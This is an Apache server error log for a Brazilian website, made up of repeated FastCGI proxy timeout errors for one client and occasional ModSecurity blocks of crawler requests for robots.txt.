[Sun Mar 15 10:46:39.141805 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:52036] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:47:01.143922 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52322] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:47:22.153874 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52534] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:47:43.121280 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52748] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:48:07.120917 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53004] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:48:28.133832 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53238] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:48:49.037925 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53522] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:49:10.033950 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53750] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:49:23.645533 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.228.16:35068] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba449SswJuvopo3lOjblwAAAIU"]
[Sun Mar 15 10:49:31.117795 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53914] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:49:52.141793 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:54188] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:50:05.638362 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.244.31:59376] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba5DHjZBu2q05ozVU_KswAAAUo"]
[Sun Mar 15 10:50:13.125795 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54402] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:50:35.129824 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:54654] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:50:57.121807 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:54898] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:51:18.069413 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55166] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:51:40.025803 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55452] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:52:01.057828 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55724] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:52:22.129793 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55950] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:52:43.129867 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56168] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:53:04.133950 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56372] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:53:26.125830 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56612] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:53:50.561832 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56966] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:54:12.098543 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57188] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:54:33.136560 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57400] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:54:34.440587 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.228.16:49206] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba6GnbQATo66fKoS7y9LwAAAM8"]
[Sun Mar 15 10:54:54.125857 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:57600] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:55:15.122099 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57826] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:55:24.284550 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.244.31:53208] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba6THbQATo66fKoS7y9UAAAANc"]
[Sun Mar 15 10:55:36.126042 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:58052] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:55:57.143320 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:58292] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:56:18.133785 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58572] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:56:39.121778 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58832] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:57:02.126454 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59066] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:57:23.126024 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59308] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:57:44.129824 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59584] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:58:05.133839 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59822] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:58:26.125847 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60080] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:58:48.133878 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:60336] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:59:10.129794 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:60654] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:59:33.129785 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60962] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:59:54.661813 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33032] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:00:16.137770 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33290] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:00:26.614675 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.244.31:32768] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba7ebABkC4fWIHEf8FiywAAAFY"]
[Sun Mar 15 11:00:38.125823 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:33560] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:01:00.133843 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33872] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:01:22.121922 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:34202] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:01:44.136247 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34504] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:02:06.102246 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:34782] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:02:27.578137 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35038] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:02:49.133817 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:35342] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:03:10.126584 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:35636] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:03:31.133775 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:35934] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:03:53.125811 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36264] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:04:14.077939 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36562] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:04:35.097821 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36960] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:04:56.129828 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37360] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:05:17.125793 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:37696] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:05:39.062833 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:37986] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:06:00.129809 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:38304] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:06:22.146690 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:38664] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:06:43.065815 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38970] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:07:06.129825 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39354] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:07:27.133795 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39656] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:07:48.126975 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39920] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:08:10.081818 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:40208] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:08:31.117808 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40460] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:08:52.117830 2026] [proxy_fcgi:error] [pid 11972:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40734] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:09:15.129906 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:41026] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:09:36.045874 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41306] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:09:57.133826 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41694] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:10:18.133809 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41984] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:10:30.634813 2026] [:error] [pid 21946:tid 140411557287680] [client 74.7.228.16:48114] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba91nbQATo66fKoS7zALAAAANY"]
[Sun Mar 15 11:10:39.120792 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42246] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:11:00.141826 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42578] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:11:22.133795 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42916] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:11:43.133772 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43204] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:12:05.125884 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43480] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:12:33.131957 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43772] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:12:55.125906 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44060] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:13:16.085850 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44400] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:13:39.129975 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44684] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:14:00.129779 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:44960] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:14:22.125779 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45198] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:14:43.033841 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45448] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:15:04.131308 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45750] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:15:25.067891 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45978] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:15:37.770567 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.228.16:58078] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba_CZqj1wV0Si-OkedW3wAAAAA"]
[Sun Mar 15 11:15:46.131029 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46182] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:16:07.151664 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46436] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:16:27.141169 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.244.31:33768] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba_OnbQATo66fKoS7zBJAAAAMI"]
[Sun Mar 15 11:16:28.132565 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:46722] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:16:49.121800 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46986] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:17:10.084987 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:47210] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:17:31.133766 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47440] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:17:54.039759 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47774] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:18:15.133800 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48106] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:18:38.033846 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48466] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:19:01.125796 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:48796] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:19:22.091537 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:49112] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:19:44.049920 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:49480] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:20:05.127908 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49818] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:20:26.133846 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:50084] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:20:47.120654 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50388] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:21:04.383176 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.228.16:43964] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbAT3bQATo66fKoS7zB3QAAANc"]
[Sun Mar 15 11:21:08.133805 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:50740] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:21:29.125778 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:51062] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:21:34.337447 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.244.31:54720] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbAbrABkC4fWIHEf8FmYgAAAE0"]
[Sun Mar 15 11:21:50.057866 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51408] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:22:11.153880 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51720] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:22:32.133779 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51974] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:22:53.125816 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52270] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:23:15.125790 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52598] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:23:36.129803 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52846] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:23:59.079958 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53086] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:24:24.130103 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53404] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:24:47.133871 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53690] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:25:08.133785 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:53932] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:25:29.045892 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54204] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:25:50.853905 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54460] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:26:08.111232 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.228.16:37002] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbBgHbQATo66fKoS7zCgwAAAMs"]
[Sun Mar 15 11:26:12.134105 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54734] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:26:34.045979 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55002] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:26:55.120246 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55282] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:27:00.632376 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.244.31:43376] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbBtHjZBu2q05ozVU_QuwAAAUw"]
[Sun Mar 15 11:27:16.120502 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55496] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:27:37.104640 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55756] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:27:58.129770 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:56086] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:28:20.121807 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56356] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:28:41.137796 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56580] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:29:02.121897 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56814] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:29:23.137830 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57096] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:29:46.125944 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57330] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:30:08.045841 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57622] AH01075: Error dispatching request to : (polling)
